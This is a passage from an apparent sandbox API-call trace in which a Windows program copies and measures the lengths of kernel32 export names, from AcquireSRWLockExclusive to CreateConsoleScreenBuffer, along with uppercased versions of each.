lpString1=0x3f2d468, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0082.908] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0082.908] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0082.908] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0082.908] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0082.908] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0082.908] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0082.908] lstrlenA (lpString="ADDATOMA") returned 8 [0082.908] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0082.909] lstrlenA (lpString="ADDATOMW") returned 8 [0082.909] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0082.909] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0082.909] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0082.909] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0082.909] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0082.909] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0082.909] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0082.909] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0082.909] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0082.909] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0082.909] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0082.909] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0082.909] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0082.909] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0082.909] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0082.909] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0082.909] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0082.909] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0082.909] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0082.909] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0082.909] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0082.909] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0082.909] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0082.909] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0082.909] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0082.909] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0082.909] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0082.909] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0082.909] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0082.909] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0082.909] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0082.909] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0082.909] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0082.909] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0082.909] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0082.910] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0082.910] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0082.910] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0082.910] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0082.910] lstrlenA (lpString="BACKUPREAD") returned 10 [0082.910] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0082.910] lstrlenA (lpString="BACKUPSEEK") returned 10 [0082.910] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0082.910] lstrlenA (lpString="BACKUPWRITE") returned 11 [0082.910] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0082.910] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0082.910] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0082.910] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0082.910] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0082.910] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0082.910] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0082.910] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0082.910] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0082.910] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0082.910] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0082.910] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0082.910] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0082.910] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0082.910] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0082.910] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0082.910] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0082.910] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0082.910] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0082.910] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0082.910] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0082.910] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0082.910] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0082.910] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0082.910] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0082.910] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0082.910] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0082.911] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0082.911] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0082.911] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0082.911] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0082.911] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0082.911] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0082.911] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0082.911] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0082.911] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0082.911] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0082.911] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0082.911] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0082.911] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0082.911] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0082.911] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0082.911] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0082.911] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0082.911] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0082.911] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0082.911] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0082.911] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0082.911] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0082.911] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0082.911] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0082.911] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0082.911] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0082.911] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0082.911] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0082.911] lstrlenA (lpString="BEEP") returned 4 [0082.911] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0082.911] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0082.911] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0082.911] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0082.911] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0082.911] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0082.911] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0082.911] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0082.912] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0082.912] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0082.912] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0082.912] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0082.912] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0082.912] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0082.912] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0082.912] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0082.912] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0082.912] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0082.912] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0082.912] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0082.912] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0082.912] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0082.912] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0082.912] lstrlenA (lpString="CANCELIO") returned 8 [0082.912] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0082.912] lstrlenA (lpString="CANCELIOEX") returned 10 [0082.912] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0082.912] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0082.912] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0082.912] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0082.912] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0082.912] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0082.912] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0082.912] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0082.912] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0082.912] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0082.912] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0082.912] lstrlenA (lpString="CHECKELEVATION") returned 14 [0082.912] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0082.912] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0082.912] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0082.912] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0082.912] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0082.912] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0082.913] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0082.913] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0082.913] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0082.913] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0082.913] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0082.913] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0082.913] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0082.913] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0082.913] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0082.913] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0082.913] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0082.913] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0082.913] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0082.913] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0082.913] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0082.913] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0082.913] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0082.913] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0082.913] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0082.913] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0082.913] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0082.913] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0082.913] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0082.913] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0082.913] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0082.913] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0082.913] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0082.913] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0082.913] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0082.913] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0082.913] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0082.913] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0082.913] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0082.913] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0082.913] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0082.913] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0082.913] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0082.914] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0082.914] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0082.914] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0082.914] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0082.914] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0082.914] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0082.914] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0082.914] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0082.914] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0082.914] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0082.914] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0082.914] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0082.914] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0082.914] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0082.914] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0082.914] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0082.914] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0082.914] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0082.914] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0082.914] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0082.914] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0082.914] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0082.914] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0082.914] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0082.914] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0082.914] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0082.914] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0082.914] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0082.914] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0082.914] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0082.914] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0082.914] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0082.914] lstrlenA (lpString="COPYCONTEXT") returned 11 [0082.914] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0082.914] lstrlenA (lpString="COPYFILEA") returned 9 [0082.914] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0082.914] lstrlenA (lpString="COPYFILEEXA") returned 11 [0082.914] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0082.915] lstrlenA (lpString="COPYFILEEXW") returned 11 [0082.915] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0082.915] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0082.915] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0082.915] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0082.915] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0082.915] lstrlenA (lpString="COPYFILEW") returned 9 [0082.915] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0082.915] lstrlenA (lpString="COPYLZFILE") returned 10 [0082.915] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0082.915] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0082.915] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0082.915] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0082.915] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0082.915] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0082.915] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0082.915] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0082.915] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0082.915] lstrlenA 